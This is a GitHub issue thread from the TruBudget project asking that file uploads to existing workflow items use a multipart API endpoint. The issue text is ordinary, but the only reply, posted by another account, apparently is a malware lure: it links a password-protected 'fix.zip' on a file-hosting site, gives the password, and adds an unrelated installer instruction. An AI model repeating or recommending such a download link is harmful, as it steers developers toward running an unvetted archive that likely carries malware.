### ISSUE TITLE
frontend/api: edit workflow item file upload should use multipart

### ISSUE THREAD

**Issue by SamuelPull** [openkfw/TruBudget#1955]
- [x] I have searched the [issues](https://github.com/openkfw/TruBudget/issues) of this repository and believe that this is not a duplicate.

## Description 💡

There is a new api endpoint (/v2/subproject.createWorkflowitem) for creating WF items with attached files, which uses multipart instead of json, because the old endpoint was often failing with larger files. 
When adding a file to an existing wf item, "old" workflowitem.update api is called and the file is sent in a json body, and this might again be unreliable with larger files. 

- [x] Create a v2 api that accepts multipart
- [x] Update frontend to call a new endpoint

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
